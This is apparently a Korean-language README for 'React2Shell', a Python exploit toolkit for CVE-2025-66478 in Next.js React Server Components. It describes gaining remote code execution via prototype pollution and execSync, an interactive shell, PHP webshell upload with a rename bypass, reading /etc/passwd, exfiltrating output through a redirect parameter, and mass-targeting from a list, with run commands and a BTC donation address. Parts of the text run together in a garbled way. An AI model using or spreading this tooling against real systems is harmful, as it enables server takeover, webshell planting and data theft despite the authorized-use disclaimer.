
React2Shell - CVE-2025-66478 RCE 익스플로잇
이 Python 툴킷은 Next.js React Server Components (RSC) 프로토타입 오염 + React.lazy(-1) 가젯 체인을 악용하여 전체 RCE 접근을 제공하며, 인터랙티브 갓 셸, 파일 업로드 (PHP 웹셸 드로퍼) 및 ?out=을 통한 탈취를 포함합니다.

취약한 Next.js 앱(예: target.com)의 자동 탐지 및 악용. uid=33(www-data) 셸을 드롭하며 다음을 제공:
child_process.execSync를 통한 RCE → /exploit?out=UIDread /etc/passwd), 업로드{\"0\":null} → 500 E{\"digest로 RSC 핸들러 확인.Location: /exploit?out=id_outputexecSync(cmd) → stdout/stderr를 리디렉션으로 탈취.upload_txt local.txt remote.php → 쓰기+이름 바꾸기 우회.pip3 install aiohttppython3 main.pyhttp://target.com 또는 targets.txt1=탐지 2=PoC(id) 3=사용자 정의 4=갓 셸 [4]파이프: echo \"http://target\n4\" | python3 main.py
갓 셸 명령어:
upload <local.php> <remote/shell.php> # 직접 PHP 업로드
upload_txt <local> <remote/shell.php> # TXT→이름 바꾸기 우회
upload_bin <local> <remote> # 바이너리 (나중에 chmod)
help / exit
id / cat /etc/passwd / ls -la /var/www/
React2Shell_Owned/pwned_YYYYMMDD_HHMMSS.txt[취약] → uid=33(www-data)aiohttp
pip install aiohttp
승인된 침투 테스트 및 교육 목적으로만 사용 (사용자는 서비스 약관 하에 권한을 확인함). 무단 사용은 불법/비윤리적입니다.
Buy me a Coffee:
₿ BTC: 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh
©2025 khadafigans